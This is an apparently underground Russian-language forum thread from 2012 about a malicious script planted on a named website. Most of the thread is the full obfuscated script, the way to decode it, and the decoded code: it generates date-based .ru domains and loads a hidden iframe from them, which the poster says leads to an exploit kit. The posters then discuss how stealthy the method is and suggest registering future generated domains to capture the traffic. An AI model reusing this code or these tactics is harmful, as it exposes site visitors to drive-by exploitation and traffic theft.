интересный iframe

GOONER · 12.08.2012

Вот недавно в поисках новых сэмплов в трэкерах наткнулся на сабж.
Снял тут (сам скрипт ведет к BlackHole):

Код:

h**p://www.stefanianicolosi.com

Код:

<script>try{1-prototype;}catch(evsd){q=152;}
if(020==0x10){f=[93,107,99,90,106,94,102,100,21,101,91,109,107,72,86,101,90,100,100,68,106,100,88,90,105,30,30,114,3,-1,23,22,21,23,108,86,105,22,93,96,22,50,23,106,93,96,105,35,106,91,90,91,22,36,23,106,93,96,105,35,72,49,2,1,22,21,23,22,107,88,104,21,99,101,21,52,22,105,95,95,104,37,105,90,92,90,21,28,22,105,95,95,104,37,71,48,4,0,21,23,22,21,109,87,103,23,106,90,106,106,21,52,22,105,95,95,104,37,55,21,33,22,97,102,22,34,23,106,93,96,105,35,73,22,31,23,94,94,50,3,-1,23,22,21,23,95,91,31,106,90,106,106,21,53,22,37,32,113,2,1,22,21,23,22,21,23,22,21,107,94,94,106,36,104,92,91,89,23,51,21,107,91,104,107,49,2,1,22,21,23,22,114,23,91,97,106,91,21,114,3,-1,23,22,21,23,22,21,23,22,105,95,95,104,37,105,90,92,90,21,52,22,105,92,105,105,23,33,21,107,94,94,106,36,66,50,3,-1,23,22,21,23,115,2,1,22,21,23,22,103,92,106,106,105,100,21,31,106,93,96,105,35,106,91,90,91,22,31,23,106,93,96,105,35,102,100,90,70,108,90,105,67,30,50,3,-1,116,3,-1,4,0,91,108,100,88,107,95,100,101,22,71,88,100,89,102,99,67,108,99,87,92,104,60,92,100,90,105,87,105,102,104,29,108,100,94,111,31,112,4,0,21,23,22,21,109,87,103,23,90,21,52,22,99,92,109,21,59,87,105,92,30,106,101,95,109,33,39,37,39,38,30,50,3,-1,23,22,21,23,108,86,105,22,104,23,51,21,68,87,105,95,36,88,92,95,97,31,90,35,94,91,105,63,101,106,105,105,29,32,37,40,32,49,2,1,22,21,23,22,105,95,95,104,37,105,90,92,90,21,52,22,39,42,42,42,45,45,45,48,38,38,23,33,21,31,90,35,94,91,105,68,101,99,107,94,29,32,22,31,23,38,109,61,60,59,61,60,59,32,22,32,23,30,89,37,93,90,107,58,86,107,91,29,32,22,31,23,38,109,61,60,59,61,31,32,23,30,66,88,106,93,37,104,100,108,100,89,31,105,21,33,22,37,111,60,59,61,31,30,50,3,-1,23,22,21,23,106,93,96,105,35,56,22,50,23,42,45,41,45,38,50,3,-1,23,22,21,23,106,93,96,105,35,68,22,50,23,40,38,43,45,41,47,41,43,43,45,48,4,0,21,23,22,21,107,94,94,106,36,70,23,51,21,107,94,94,106,36,66,23,37,21,107,94,94,106,36,54,50,3,-1,23,22,21,23,106,93,96,105,35,73,22,50,23,106,93,96,105,35,68,22,26,23,106,93,96,105,35,56,49,2,1,22,21,23,22,105,95,95,104,37,101,99,92,69,107,92,104,66,23,51,21,40,36,37,23,37,21,107,94,94,106,36,66,50,3,-1,23,22,21,23,106,93,96,105,35,101,91,109,107,22,50,23,100,90,111,106,71,88,100,89,102,99,67,108,99,87,92,104,48,4,0,21,23,22,21,105,91,105,108,104,99,23,106,93,96,105,48,4,0,114,4,0,2,1,92,106,101,89,105,96,101,99,23,89,103,92,87,105,92,72,86,101,90,100,100,68,106,100,88,90,105,30,103,35,22,66,96,100,33,23,67,86,111,31,112,4,0,21,23,22,21,105,91,105,108,104,99,23,67,86,107,94,35,105,101,106,101,90,29,31,67,86,111,35,66,96,100,30,23,32,21,105,36,99,92,110,105,31,31,21,34,22,66,96,100,30,50,3,-1,116,3,-1,4,0,91,108,100,88,107,95,100,101,22,92,92,100,90,105,87,105,92,70,104,92,107,89,102,72,86,101,90,100,100,73,105,105,95,99,94,30,106,101,95,109,35,22,97,92,100,92,107,94,33,23,112,100,101,91,30,114,3,-1,23,22,21,23,108,86,105,22,103,88,100,89,23,51,21,101,91,108,23,72,86,101,90,100,100,68,106,100,88,90,105,61,90,101,91,103,88,106,100,105,30,106,101,95,109,32,49,2,1,22,21,23,22,107,88,104,21,99,91,105,107,91,103,106,22,50,23,24,87,108,87,109,102,103,90,105,95,102,110,97,92,93,97,89,112,91,99,113,101,104,106,103,97,111,92,102,88,111,107,103,104,23,37,105,101,99,95,105,31,29,28,32,49,2,1,22,21,23,22,107,88,104,21,106,106,103,23,51,21,30,29,48,4,0,-2,93,101,103,31,108,86,105,22,94,23,51,21,39,49,21,96,22,49,23,98,90,101,93,105,95,49,21,96,22,32,34,22,30,114,3,-1,23,22,21,23,22,21,23,22,104,107,104,21,34,51,21,99,91,105,107,91,103,106,81,88,105,91,86,107,91,71,88,100,89,102,99,67,108,99,87,92,104,29,105,87,99,91,34,21,39,34,21,99,91,105,107,91,103,106,36,97,92,100,92,107,94,21,36,22,38,32,83,48,4,0,21,23,22,21,116,3,-1,23,22,21,23,104,90,107,107,103,101,22,104,107,104,21,34,22,28,37,29,21,34,22,111,102,100,90,50,3,-1,116,3,-1,4,0,104,92,106,62,101,106,90,105,108,86,99,30,91,108,100,88,107,95,100,101,30,30,114,3,-1,23,22,21,23,106,103,112,113,2,1,22,21,23,22,21,23,22,21,96,92,29,107,111,101,92,101,91,23,95,91,105,87,98,92,77,86,106,57,103,92,87,105,92,90,21,52,51,21,25,107,99,91,91,91,96,100,90,91,24,30,114,3,-1,23,22,21,23,22,21,23,22,21,23,22,21,109,87,103,23,107,99,96,110,21,52,22,66,88,106,93,37,104,100,108,100,89,31,33,99,92,109,21,59,87,105,92,30,30,38,39,37,39,38,30,50,22,21,23,22,21,23,22,21,23,22,21,23,22,107,88,104,21,91,101,98,88,95,99,69,87,98,92,22,50,23,93,90,101,91,103,88,106,90,71,105,90,108,90,100,73,87,99,91,101,98,74,106,103,96,100,92,31,107,99,96,110,33,23,39,43,35,22,28,105,107,28,32,49,21,23,22,21,23,22,21,23,22,21,23,22,94,93,104,98,23,51,21,91,101,88,108,99,90,101,106,35,90,104,90,88,106,90,60,98,90,100,91,99,107,30,23,64,60,71,56,67,58,25,31,48,23,3,-1,23,22,21,23,22,21,23,22,21,23,22,21,96,92,103,100,36,104,92,106,54,107,106,103,96,88,106,107,91,29,25,105,103,90,24,33,23,24,93,107,106,101,49,37,36,25,33,89,102,99,86,96,100,67,88,99,90,34,24,36,96,100,35,90,93,94,54,39,42,25,31,48,23,3,-1,23,22,21,23,22,21,23,22,21,23,22,21,96,92,103,100,36,104,107,111,97,92,36,108,96,90,105,95,22,50,23,24,37,103,110,23,50,22,2,1,22,21,23,22,21,23,22,21,23,22,21,23,95,91,105,99,35,106,106,110,99,91,35,95,91,94,94,94,105,23,51,21,25,38,101,111,24,48,23,3,-1,23,22,21,23,22,21,23,22,21,23,22,21,96,92,103,100,36,104,107,111,97,92,36,107,96,105,94,89,95,97,96,106,110,23,51,21,25,94,94,91,90,90,101,24,48,23,3,-1,23,22,21,23,22,21,23,22,21,23,22,21,91,101,88,108,99,90,101,106,35,89,101,89,112,36,86,103,102,90,101,90,56,95,95,97,91,30,94,93,104,98,32,49,2,1,-1,-2,0,95,91,105,87,98,92,77,86,106,57,103,92,87,105,92,90,21,52,22,105,105,107,90,50,3,-1,23,22,21,23,22,21,23,22,114,4,0,21,23,22,21,116,89,86,107,89,93,31,91,30,114,95,91,105,87,98,92,77,86,106,57,103,92,87,105,92,90,21,52,22,106,101,90,90,93,95,99,92,90,48,116,3,-1,116,34,21,40,38,37,32,49];}if(window.document)e=eval;w=f;s=[];r=String.fromCharCode;for(i=0;-i+1769!=0;i+=1){j=i;s=s+r((w[j]*1+(9+e("j"+"%"+"3"))));}
if(q&&f&&012===10)e(s);</script>

Расшифровывается в хроме оч. просто, заменой:

Код:

e(s); на console.log(s);

В итоге если, привести все в удобоваримый вид, получаем:

Код:

function nextRandomNumber(){
    var hi = this.seed / this.Q;
    var lo = this.seed % this.Q;
    var test = this.A * lo - this.R * hi;
    if(test > 0){
        this.seed = test;
    } else {
        this.seed = test + this.M;
    }
    return (this.seed * this.oneOverM);
}

function RandomNumberGenerator(unix){
    var d = new Date(unix*1000);
    var s = Math.ceil(d.getHours()/3);
    this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF)+ (Math.round(s * 0xFFF));
    this.A = 48271;
    this.M = 2147483647;
    this.Q = this.M / this.A;
    this.R = this.M % this.A;
    this.oneOverM = 1.0 / this.M;
    this.next = nextRandomNumber;
    return this;
}

function createRandomNumber(r, Min, Max){
    return Math.round((Max-Min) * r.next() + Min);
}

function generatePseudoRandomString(unix, length, zone){
    var rand = new RandomNumberGenerator(unix);
    var letters = "buaxoqeriqwkgfkdyenzossqlxfqayvpr".split('');
    var str = '';
	for(var i = 0; i < length; i ++ ){
        str += letters[createRandomNumber(rand, 0, letters.length - 1)];
    }
    return str + '.' + zone;
}

setInterval(function(){
    try{
        if(typeof iframeWasCreated == "undefined"){
            var unix = Math.round(+new Date()/1000);
var domainName = generatePseudoRandomString(unix, 16, 'ru');
ifrm = document.createElement("IFRAME"); 
            ifrm.setAttribute("src", "http://"+domainName+"/in.cgi?15"); 
            ifrm.style.width = "0px"; 
            ifrm.style.height = "0px"; 
            ifrm.style.visibility = "hidden"; 
            document.body.appendChild(ifrm);
			iframeWasCreated = true;
        }
    }catch(e){iframeWasCreated = undefined;}
}, 100);

Этот скрипт интересен тем, что он перенаправляет на домен, который генерируется в зависимости от текущей даты (длина 16 символом, дом. зона ru, льют на SutraTDS).
P.S. Хотелось бы услышать ваши мнения об эффективности/палевности данного метода.

Left4Dead · 12.08.2012

Аверы покопаются - и все возможные домены скопом лягут в бан. Почему бы просто не менять на рандомный домен по мере надобности? Они почему-то не смогли автоматизировать этот процесс и выдумали вот такой тупой костыль.

AHTOLLlKA · 13.08.2012

можно нагенерить на будущее доменов и регнуть их слив трафик \=

Ar3s · 13.08.2012

Мы уже это обсуждали с gooner. Теоретически - поток там должен быть не плохой.

doll · 13.08.2012

Вот еще интересный линк на данную тему.
http://blog.unmaskparasites.com/2012/07/26...imate-js-files/

GOONER · 14.08.2012

doll , в этой статье помимо генерации доменов, описуют шифрование строк с использованием домена взломанного ресурса в в качестве ключа шифрования.

casesensitive · 02.09.2012

interesting post

интересный iframe

GOONER

(L3) cache

Left4Dead

(L3) cache

AHTOLLlKA

(L2) cache

Ar3s

Старожил форума

doll

HDD-drive

GOONER

(L3) cache

casesensitive

floppy-диск